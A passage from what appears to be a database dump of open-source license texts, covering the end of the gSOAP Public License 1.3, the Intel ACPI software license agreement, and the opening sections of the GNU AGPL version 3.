to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5 APPLICATION OF THIS LICENSE.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6 VERSIONS OF THE LICENSE.\n\n 6.1. New Versions.\n\nGrantor may publish revised and/or new versions of the License from time to\ntime. Each version will be given a distinguishing version number.\n\n 6.2. Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License.\n\n 6.3. Derivative Works.\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrase \"gSOAP\"\nor any confusingly similar phrase do not appear in your license (except to\nnote that you license differs from this License) and (b) otherwise make it\nclear that Your version of the license contains terms which differ from the\ngSOAP Public License. (Filling in the name of the Initial Developer, Original\nCode or Contributor in the notice described in Exhibit A shall not of themselves\nbe deemed to be modifications of this License.)\n\n 7 DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, WITHOUT LIMITATION,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY, OF FITNESS FOR A PARTICULAR PURPOSE,\nNONINFRINGEMENT OF THIRD PARTY INTELLECTUAL PROPERTY RIGHTS, AND ANY WARRANTY\nTHAT MAY ARISE BY REASON OF TRADE USAGE, CUSTOM, OR COURSE OF DEALING. WITHOUT\nLIMITING THE FOREGOING, YOU ACKNOWLEDGE THAT THE SOFTWARE IS PROVIDED \"AS\nIS\" AND THAT THE AUTHORS DO NOT WARRANT THE SOFTWARE WILL RUN UNINTERRUPTED\nOR ERROR FREE. LIMITED LIABILITY THE ENTIRE RISK AS TO RESULTS AND PERFORMANCE\nOF THE SOFTWARE IS ASSUMED BY YOU. UNDER NO CIRCUMSTANCES WILL THE AUTHORS\nBE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, EXEMPLARY OR CONSEQUENTIAL\nDAMAGES OF ANY KIND OR NATURE WHATSOEVER, WHETHER BASED ON CONTRACT, WARRANTY,\nTORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, ARISING OUT OF\nOR IN ANY WAY RELATED TO THE SOFTWARE, EVEN IF THE AUTHORS HAVE BEEN ADVISED\nON THE POSSIBILITY OF SUCH DAMAGE OR IF SUCH DAMAGE COULD HAVE BEEN REASONABLY\nFORESEEN, AND NOTWITHSTANDING ANY FAILURE OF ESSENTIAL PURPOSE OF ANY EXCLUSIVE\nREMEDY PROVIDED. SUCH LIMITATION ON DAMAGES INCLUDES, BUT IS NOT LIMITED TO,\nDAMAGES FOR LOSS OF GOODWILL, LOST PROFITS, LOSS OF DATA OR SOFTWARE, WORK\nSTOPPAGE, COMPUTER FAILURE OR MALFUNCTION OR IMPAIRMENT OF OTHER GOODS. IN\nNO EVENT WILL THE AUTHORS BE LIABLE FOR THE COSTS OF PROCUREMENT OF SUBSTITUTE\nSOFTWARE OR SERVICES. YOU ACKNOWLEDGE THAT THIS SOFTWARE IS NOT DESIGNED FOR\nUSE IN ON-LINE EQUIPMENT IN HAZARDOUS ENVIRONMENTS SUCH AS OPERATION OF NUCLEAR\nFACILITIES, AIRCRAFT NAVIGATION OR CONTROL, OR LIFE-CRITICAL APPLICATIONS.\nTHE AUTHORS EXPRESSLY DISCLAIM ANY LIABILITY RESULTING FROM USE OF THE SOFTWARE\nIN ANY SUCH ON-LINE EQUIPMENT IN HAZARDOUS ENVIRONMENTS AND ACCEPTS NO LIABILITY\nIN RESPECT OF ANY ACTIONS OR CLAIMS BASED ON THE USE OF THE SOFTWARE IN ANY\nSUCH ON-LINE EQUIPMENT IN HAZARDOUS ENVIRONMENTS BY YOU. FOR PURPOSES OF THIS\nPARAGRAPH, THE TERM \"LIFE-CRITICAL APPLICATION\" MEANS AN APPLICATION IN WHICH\nTHE FUNCTIONING OR MALFUNCTIONING OF THE SOFTWARE MAY RESULT DIRECTLY OR INDIRECTLY\nIN PHYSICAL INJURY OR LOSS OF HUMAN LIFE. THIS DISCLAIMER OF WARRANTY CONSTITUTES\nAN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED\nHEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8 TERMINATION.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 8.2.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9 LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10 U.S. GOVERNMENT END USERS.\n\n 11 MISCELLANEOUS.\n\n 12 RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n \n\n EXHIBIT A.\n\n\"The contents of this file are subject to the gSOAP Public License Version\n1.3 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at\n\n http://www.cs.fsu.edu/ engelen/soaplicense.html\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code of the gSOAP Software is: stdsoap.h, stdsoap2.h, stdsoap.c,\nstdsoap2.c, stdsoap.cpp, stdsoap2.cpp, soapcpp2.h, soapcpp2.c, soapcpp2_lex.l,\nsoapcpp2_yacc.y, error2.h, error2.c, symbol2.c, init2.c, soapdoc2.html, and\nsoapdoc2.pdf, httpget.h, httpget.c, stl.h, stldeque.h, stllist.h, stlvector.h,\nstlset.h.\n\nThe Initial Developer of the Original Code is Robert A. van Engelen. Portions\ncreated by Robert A. van Engelen are Copyright (C) 2001-2004 Robert A. van\nEngelen, Genivia inc. All Rights Reserved.\n\n Contributor(s):\n\n \"________________________.\"\n\n[Note: The text of this Exhibit A may differ slightly form the text of the\nnotices in the Source Code files of the Original code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n\n \n\n EXHIBIT B.\n\n \"Part of the software embedded in this product is gSOAP software.\n\nPortions created by gSOAP are Copyright (C) 2001-2009 Robert A. van Engelen,\nGenivia inc. All Rights Reserved.\n\nTHE SOFTWARE IN THIS PRODUCT WAS IN PART PROVIDED BY GENIVIA INC AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(180,'Intel-ACPI','ACPI - Software License Agreement\n\nSoftware License Agreement IMPORTANT - READ BEFORE COPYING, INSTALLING OR\nUSING.\n\nDo not use or load this software and any associated materials (collectively,\nthe \"Software\") until you have carefully read the following terms and conditions.\nBy loading or using the Software, you agree to the terms of this Agreement.\nIf you do not wish to so agree, do not install or use the Software.\n\n1. COPYRIGHT NOTICE Some or all of this work - Copyright © 1999-2005, Intel\nCorp. All rights reserved.\n\n 2. LICENSE\n\n2.1. This is your license from Intel Corp. under its intellectual property\nrights. You may have additional license terms from the party that provided\nyou this software, covering your right to use that party\'s intellectual property\nrights.\n\n2.2. Intel grants, free of charge, to any person (\"Licensee\") obtaining a\ncopy of the source code appearing in this file (\"Covered Code\") an irrevocable,\nperpetual, worldwide license under Intel\'s copyrights in the base code distributed\noriginally by Intel (\"Original Intel Code\") to copy, make derivatives, distribute,\nuse and display any portion of the Covered Code in any form, with the right\nto sublicense such rights; and\n\n2.3. Intel grants Licensee a non-exclusive and non-transferable patent license\n(with the right to sublicense), under only those claims of Intel patents that\nare infringed by the Original Intel Code, to make, use, sell, offer to sell,\nand import the Covered Code and derivative works thereof solely to the minimum\nextent necessary to exercise the above copyright license, and in no event\nshall the patent license extend to any additions to or modifications of the\nOriginal Intel Code. No other license or right is granted directly or by implication,\nestoppel or otherwise; The above copyright and patent license is granted only\nif the following conditions are met:\n\n 3. CONDITIONS\n\n3.1. Redistribution of Source with Rights to Further Distribute Source. Redistribution\nof source code of any substantial portion of the Covered Code or modification\nwith rights to further distribute source must include the above Copyright\nNotice, the above License, this list of Conditions, and the following Disclaimer\nand Export Compliance provision. In addition, Licensee must cause all Covered\nCode to which Licensee contributes to contain a file documenting the changes\nLicensee made to create that Covered Code and the date of any change. Licensee\nmust include in that file the documentation of any changes made by any predecessor\nLicensee. Licensee must include a prominent statement that the modification\nis derived, directly or indirectly, from Original Intel Code.\n\n3.2. Redistribution of Source with no Rights to Further Distribute Source.\nRedistribution of source code of any substantial portion of the Covered Code\nor modification without rights to further distribute source must include the\nfollowing Disclaimer and Export Compliance provision in the documentation\nand/or other materials provided with distribution. In addition, Licensee may\nnot authorize further sublicense of source of any portion of the Covered Code,\nand must include terms to the effect that the license from Licensee to its\nlicensee is limited to the intellectual property embodied in the software\nLicensee provides to its licensee, and not to intellectual property embodied\nin modifications its licensee may make.\n\n3.3. Redistribution of Executable. Redistribution in executable form of any\nsubstantial portion of the Covered Code or modification must reproduce the\nabove Copyright Notice, and the following Disclaimer and Export Compliance\nprovision in the documentation and/or other materials provided with the distribution.\n\n3.4. Intel retains all right, title, and interest in and to the Original Intel\nCode.\n\n3.5. Neither the name Intel nor any other trademark owned or controlled by\nIntel shall be used in advertising or otherwise to promote the sale, use or\nother dealings in products derived from or relating to the Covered Code without\nprior written authorization from Intel.\n\n 4. DISCLAIMER AND EXPORT COMPLIANCE\n\n4.1. INTEL MAKES NO WARRANTY OF ANY KIND REGARDING ANY SOFTWARE PROVIDED HERE.\nANY SOFTWARE ORIGINATING FROM INTEL OR DERIVED FROM INTEL SOFTWARE IS PROVIDED\n\"AS IS,\" AND INTEL WILL NOT PROVIDE ANY SUPPORT, ASSISTANCE, INSTALLATION,\nTRAINING OR OTHER SERVICES. INTEL WILL NOT PROVIDE ANY UPDATES, ENHANCEMENTS\nOR EXTENSIONS. INTEL SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTIES OF MERCHANTABILITY,\nNONINFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.\n\n4.2. IN NO EVENT SHALL INTEL HAVE ANY LIABILITY TO LICENSEE, ITS LICENSEES\nOR ANY OTHER THIRD PARTY, FOR ANY LOST PROFITS, LOST DATA, LOSS OF USE OR\nCOSTS OF PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES, OR FOR ANY INDIRECT,\nSPECIAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THIS AGREEMENT, UNDER ANY\nCAUSE OF ACTION OR THEORY OF LIABILITY, AND IRRESPECTIVE OF WHETHER INTEL\nHAS ADVANCE NOTICE OF THE POSSIBILITY OF SUCH DAMAGES. THESE LIMITATIONS SHALL\nAPPLY NOTWITHSTANDING THE FAILURE OF THE ESSENTIAL PURPOSE OF ANY LIMITED\nREMEDY.\n\n4.3. Licensee shall not export, either directly or indirectly, any of this\nsoftware or system incorporating such software without first obtaining any\nrequired license or other approval from the U. S. Department of Commerce or\nany other agency or department of the United States Government. In the event\nLicensee exports any such software from the United States or re-exports any\nsuch software from a foreign destination, Licensee shall ensure that the distribution\nand export/re-export of the software is in compliance with all laws, regulations,\norders, or other restrictions of the U.S. Export Administration Regulations.\nLicensee agrees that neither it nor any of its subsidiaries will export/re-export\nany technical data, process, software, or service, directly or indirectly,\nto any country for which the United States government or any agency thereof\nrequires an export license, other governmental approval, or letter of assurance,\nwithout first obtaining such license, approval or letter.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(181,'AGPL-3.0-only','GNU AFFERO GENERAL PUBLIC LICENSE\n\nVersion 3, 19 November 2007\n\nCopyright (C) 2007 Free Software Foundation, Inc. <http s ://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\nPreamble\n\nThe GNU Affero General Public License is a free, copyleft license for software\nand other kinds of works, specifically designed to ensure cooperation with\nthe community in the case of network server software.\n\nThe licenses for most software and other practical works are designed to take\naway your freedom to share and change the works. By contrast, our General\nPublic Licenses are intended to guarantee your freedom to share and change\nall versions of a program--to make sure it remains free software for all its\nusers.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for them if you wish), that\nyou receive source code or can get it if you want it, that you can change\nthe software or use pieces of it in new free programs, and that you know you\ncan do these things.\n\nDevelopers that use our General Public Licenses protect your rights with two\nsteps: (1) assert copyright on the software, and (2) offer you this License\nwhich gives you legal permission to copy, distribute and/or modify the software.\n\nA secondary benefit of defending all users\' freedom is that improvements made\nin alternate versions of the program, if they receive widespread use, become\navailable for other developers to incorporate. Many developers of free software\nare heartened and encouraged by the resulting cooperation. However, in the\ncase of software used on network servers, this result may fail to come about.\nThe GNU General Public License permits making a modified version and letting\nthe public access it on a server without ever releasing its source code to\nthe public.\n\nThe GNU Affero General Public License is designed specifically to ensure that,\nin such cases, the modified source code becomes available to the community.\nIt requires the operator of a network server to provide the source code of\nthe modified version running there to the users of that server. Therefore,\npublic use of a modified version, on a publicly accessible server, gives the\npublic access to the source code of the modified version.\n\nAn older license, called the Affero General Public License and published by\nAffero, was designed to accomplish similar goals. This is a different license,\nnot a version of the Affero GPL, but Affero has released a new version of\nthe Affero GPL which permits relicensing under this license.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow.\n\nTERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU Affero General Public License.\n\n\"Copyright\" also means copyright-like laws that apply to other kinds of works,\nsuch as semiconductor masks.\n\n\"The Program\" refers to any copyrightable work licensed under this License.\nEach licensee is addressed as \"you\". \"Licensees\" and \"recipients\" may be individuals\nor organizations.\n\nTo \"modify\" a work means to copy from or adapt all or part of the work in\na fashion requiring copyright permission, other than the making of an exact\ncopy. The resulting work is called a \"modified version\" of the earlier work\nor a work \"based on\" the earlier work.\n\nA \"covered work\" means either the unmodified Program or a work based on the\nProgram.\n\nTo \"propagate\" a work means to do anything with it that, without permission,\nwould make you directly or secondarily liable for infringement under applicable\ncopyright law, except executing it on a computer or modifying a private copy.\nPropagation includes copying, distribution (with or without modification),\nmaking available to the public, and in some countries other activities as\nwell.\n\nTo \"convey\" a work means any kind of propagation that enables other parties\nto make or receive copies. Mere interaction with a user through a computer\nnetwork, with no transfer of a copy, is not conveying.\n\nAn interactive user interface displays \"Appropriate Legal Notices\" to the\nextent that it includes a convenient and prominently visible feature that\n(1) displays an appropriate copyright notice, and (2) tells the user that\nthere is no warranty for the work (except to the extent that warranties are\nprovided), that licensees may convey the work under this License, and how\nto view a copy of this License. If the interface presents a list of user commands\nor options, such as a menu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\nThe \"source code\" for a work means the preferred form of the work for making\nmodifications to it. \"Object code\" means any non-source form of a work.\n\nA \"Standard Interface\" means an interface that either is an official standard\ndefined by a recognized standards body, or, in the case of interfaces specified\nfor a particular programming language, one that is widely used among developers\nworking in that language.\n\nThe \"System Libraries\" of an executable work include anything, other than\nthe work as a whole, that (a) is included in the normal form of packaging\na Major Component, but which is not part of that Major Component, and (b)\nserves only to enable use of the work with that Major Component, or to implement\na Standard Interface for which an implementation is available to the public\nin source code form. A \"Major Component\", in this context, means a major essential\ncomponent (kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to produce\nthe work, or an object code interpreter used to run it.\n\nThe \"Corresponding Source\" for a work in object code form means all the source\ncode needed to generate, install, and (for an executable work) run the object\ncode and to modify the work, including scripts to control those activities.\nHowever, it does not include the work\'s System Libraries, or general-purpose\ntools or generally available free programs which are used unmodified in performing\nthose activities but which are not part of the work. For example, Corresponding\nSource includes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically linked\nsubprograms that the work is specifically designed to require, such as by\nintimate data communication or control flow between those\n\n subprograms and other parts of the work.\n\nThe Corresponding Source need not include anything that users can regenerate\nautomatically from other parts of the Corresponding Source.\n\n The Corresponding Source for a work in source code form is that same work.\n\n 2. Basic Permissions.\n\nAll rights granted under this License are granted for the term of copyright\non the Program, and are irrevocable provided the stated conditions are met.\nThis License explicitly affirms your unlimited permission to run the unmodified\nProgram. The output from running a covered work is covered by this License\nonly if the output, given its content, constitutes a covered work. This License\nacknowledges your rights of fair use or other equivalent, as provided by copyright\nlaw.\n\nYou may make, run and propagate covered works that you do not convey, without\nconditions so long as your license otherwise remains in force. You may convey\ncovered works to others for the sole purpose of having them make modifications\nexclusively for you, or provide you with facilities for running those works,\nprovided that you comply with the terms of this License in conveying all material\nfor which you do not control copyright. Those thus making or running the covered\nworks for you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of your copyrighted\nmaterial outside their relationship with you.\n\nConveying under any other circumstances is permitted solely under the conditions\nstated below. Sublicensing is not allowed; section 10 makes it unnecessary.\n\n 3. Protecting Users\' Legal Rights From Anti-Circumvention Law.\n\nNo covered work shall be deemed part of an effective technological measure\nunder any applicable law fulfilling obligations under article 11 of the WIPO\ncopyright treaty adopted on 20 December 1996, or similar laws prohibiting\nor restricting circumvention of such measures.\n\nWhen you convey a covered work, you waive any legal power to forbid circumvention\nof technological measures to the extent such circumvention is effected by\nexercising rights under this License with respect to the covered work, and\nyou disclaim any intention to limit operation or modification of the work\nas a means of enforcing, against the work\'s users, your or third parties\'\nlegal rights to forbid circumvention of technological measures.\n\n 4. Conveying Verbatim Copies.\n\nYou may convey verbatim copies of the Program\'s source code as you receive\nit, in any medium, provided that you conspicuously and appropriately publish\non each copy an appropriate copyright notice; keep intact all notices stating\nthat this License and any non-permissive terms added in accord with section\n7 apply to the code; keep intact all notices of the absence of any warranty;\nand give all recipients a copy of this License along with the Program.\n\nYou may charge any price or no price for each copy that you convey, and you\nmay offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\nYou may convey a work based on the Program, or the modifications to produce\nit from the Program, in the form of source code under the terms of section\n4, provided that you also meet all of these conditions:\n\na) The work must carry prominent notices stating that you modified it, and\ngiving a relevant date.\n\nb) The work must carry prominent notices stating that it is released under\nthis License and any conditions added under section 7. This requirement modifies\nthe requirement in section 4 to \"keep intact all notices\".\n\nc) You must license the entire work, as a whole, under this License to anyone\nwho comes into possession of a copy. This License will therefore apply, along\nwith any applicable section 7 additional terms, to the whole of the work,\nand all its parts, regardless of how they are packaged. This License gives\nno permission to license the work in any other way, but it does not invalidate\nsuch permission if you have separately received it.\n\nd) If the work has interactive user interfaces, each must display Appropriate\nLegal Notices; however, if the Program has interactive interfaces that do\nnot display Appropriate Legal Notices, your work need not make them do so.\n\nA compilation of a covered work with other separate and independent works,\nwhich are not by their nature extensions of the covered work, and which are\nnot combined with it such as to form a larger program, in or on a volume of\na storage or distribution medium, is called an \"aggregate\" if the compilation\nand its resulting copyright are not used to limit the access or legal rights\nof the compilation\'s users beyond what the individual works permit. Inclusion\nof a covered work in an aggregate does not cause this License to apply to\nthe other parts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\nYou may convey a covered work in object code form under the terms of sections\n4 and 5, provided that you also convey the machine-readable Corresponding\nSource under the terms of this License, in one of these ways:\n\na) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by the Corresponding Source fixed\non a durable physical medium customarily used for software interchange.\n\nb) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by a written offer, valid for\nat least three years and valid for as long as you offer spare parts or customer\nsupport for that product model, to give anyone who possesses the object code\neither (1) a copy of the Corresponding Source for all the software in the\nproduct that is covered by this License, on a durable physical medium customarily\nused for software interchange, for a price no more than your reasonable cost\nof physically performing this conveying of source, or (2) access to copy the\nCorresponding Source from a network server at no charge.\n\nc) Convey individual copies of the object code with a copy of the written\noffer to provide the Corresponding Source. This alternative is allowed only\noccasionally and noncommercially, and only if you received the object code\nwith such an offer, in accord with subsection 6b.\n\nd) Convey the object code by offering access from a designated place (gratis\nor for a charge), and offer equivalent access to the Corresponding Source\nin the same way through the same place at no further charge. You need not\nrequire recipients to copy the Corresponding Source along with the object\ncode. If the place to copy the object code is a network server, the Corresponding\nSource may be on a different server (operated by you or a third party) that\nsupports equivalent copying facilities, provided you maintain clear directions\nnext to the object code saying where to find the Corresponding Source. Regardless\nof what server hosts the Corresponding Source, you remain obligated to ensure\nthat it is available for as long as needed to satisfy these requirements.\n\ne) Convey the object code using peer-to-peer transmission, provided you inform\nother peers where the object code and Corresponding Source of the work are\nbeing offered to the general public at no charge under subsection 6d.\n\nA separable portion of the object code, whose source code is excluded from\nthe Corresponding Source as a System Library, need not be included in conveying\nthe object code work.\n\nA \"User Product\" is either (1) a \"consumer product\", which means any tangible\npersonal property which is normally used for personal, family, or household\npurposes, or (2) anything designed or sold for incorporation into a dwelling.\nIn determining whether a product is a consumer product, doubtful cases shall\nbe resolved in favor of coverage. For a particular product received by a particular\nuser, \"normally used\" refers to a typical or common use of that class of product,\nregardless of the status of the particular user or of the way in which the\nparticular user actually uses, or expects or is expected to use, the product.\nA product is a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent the\nonly significant mode of use of the product.\n\n\"Installation Information\" for a User Product means any methods, procedures,\nauthorization keys, or other information required to install and execute modified\nversions of a covered work in that User Product from a modified version of\nits Corresponding Source. The information must suffice to ensure that the\ncontinued functioning of the modified object code is in no case prevented\nor interfered with solely because modification has been made.\n\nIf you convey an object code work under this section in, or with, or specifically\nfor use in, a User Product, and the conveying occurs as part of a transaction\nin which the right of possession and use of the User Product is transferred\nto the recipient in perpetuity or for a fixed term (regardless of how the\ntransaction is characterized), the Corresponding Source conveyed under this\nsection must be accompanied by the Installation Information. But this requirement\ndoes not apply if neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has been installed\nin ROM).\n\nThe requirement to provide Installation Information does not include a requirement\nto continue to provide support service, warranty, or updates for a work that\nhas been modified or installed by the recipient, or for the User Product in\nwhich it has been modified or installed. Access to a network may be denied\nwhen the modification itself materially and adversely affects the operation\nof the network or violates the rules and protocols for communication across\nthe network.\n\nCorresponding Source conveyed, and Installation Information provided, in accord\nwith this section must be in a format that is publicly documented (and with\nan implementation available to the public in source code form), and must require\nno special password or key for unpacking, reading or copying.\n\n 7. Additional Terms.\n\n\"Additional permissions\" are terms that supplement the terms of this License\nby making exceptions from one or more of its conditions. Additional permissions\nthat are applicable to the entire Program shall be treated as though they\nwere included in this License, to the extent that they are valid under applicable\nlaw. If additional permissions apply only to part of the Program, that part\nmay be used separately under those permissions, but the entire Program remains\ngoverned by this License without regard to the additional permissions.\n\nWhen you convey a copy of a covered work, you may at your option remove any\nadditional permissions from that copy, or from any part of it. (Additional\npermissions may be written to require their own removal in certain cases when\nyou modify the work.) You may place additional permissions on material, added\nby you to a covered work, for which you have or can give appropriate copyright\npermission.\n\nNotwithstanding any other provision of this License, for material you add\nto a covered work, you may (if authorized by the copyright holders of that\nmaterial) supplement the terms of this License with terms:\n\na) Disclaiming warranty or limiting liability differently from the terms of\nsections 15 and 16 of this License; or\n\nb) Requiring preservation of specified reasonable legal notices or author\nattributions in that material or in the Appropriate Legal Notices displayed\nby works containing it; or\n\nc) Prohibiting misrepresentation of the origin of that material, or requiring\nthat modified versions of such material be marked in reasonable ways as different\nfrom the original version; or\n\nd) Limiting the use for publicity purposes of names of licensors or authors\nof the material; or\n\ne) Declining to grant rights under trademark law for use of some trade names,\ntrademarks, or service marks; or\n\nf) Requiring indemnification of licensors and authors of that material by\nanyone who conveys the material (or modified versions of it) with contractual\nassumptions of liability to the recipient, for any liability that these contractual\nassumptions directly impose on those licensors and authors.\n\nAll other non-permissive additional terms are considered \"further restrictions\"\nwithin the meaning of section 10. If the Program as you received it, or any\npart of it, contains a notice stating that it is governed by this License\nalong with a term that is a further restriction, you may remove that term.\nIf a license document contains a further restriction but permits relicensing\nor conveying under this License, you may add to a covered work material governed\nby the terms of that license document, provided that the further restriction\ndoes not survive such relicensing or conveying.\n\nIf you add terms to a covered work in accord with this section, you must place,\nin the relevant source files, a statement of the additional terms that apply\nto those files, or a notice indicating where to find the applicable terms.\n\nAdditional terms, permissive or non-permissive, may be stated in the form\nof a separately written license, or stated as exceptions; the above requirements\napply either way.\n\n 8. Termination.\n\nYou may not propagate or modify a covered work except as expressly provided\nunder this License. Any attempt otherwise to propagate or modify it is void,\nand will automatically terminate your rights under this License (including\nany patent licenses granted under the third paragraph of section 11).\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, you do\nnot qualify to receive new licenses for the same material under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\nYou are not required to accept this License in order to receive or run a copy\nof the Program. Ancillary propagation of a covered work occurring solely as\na consequence of using peer-to-peer transmission to receive a copy likewise\ndoes not require acceptance. However, nothing other than this License grants\nyou permission to propagate or modify any covered work. These actions infringe\ncopyright if you do not accept this License. Therefore, by modifying or propagating\na covered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\nEach time you convey a covered work, the recipient automatically receives\na license from the original licensors, to run, modify and propagate that work,\nsubject to this License. You are not responsible for enforcing compliance\nby third parties with this License.\n\nAn \"entity transaction\" is a transaction transferring control of an organization,\nor substantially all assets of one, or subdividing an organization, or merging\norganizations. If propagation of a covered work results from an entity transaction,\neach party to that transaction who receives a copy of the work also receives\nwhatever licenses to the work the party\'s predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the Corresponding\nSource of the work from the predecessor in interest, if the predecessor has\nit or can get it with reasonable efforts.\n\nYou may not impose any further restrictions on the exercise of the rights\ngranted or affirmed under this License. For example, you may not impose a\nlicense fee, royalty, or other charge for exercise of rights granted under\nthis License, and you may not initiate litigation (including a cross-claim\nor counterclaim in a lawsuit) alleging that any patent claim is infringed\nby making, using, selling, offering for sale, or importing the Program or\nany portion of it.\n\n 11. Patents.\n\nA \"contributor\" is a copyright holder who authorizes use under this License\nof the Program or a work on which the Program is based. The work thus licensed\nis called the contributor\'s \"contributor version\".\n\nA contributor\'s \"essential patent claims\" are all patent claims owned or controlled\nby the contributor, whether already 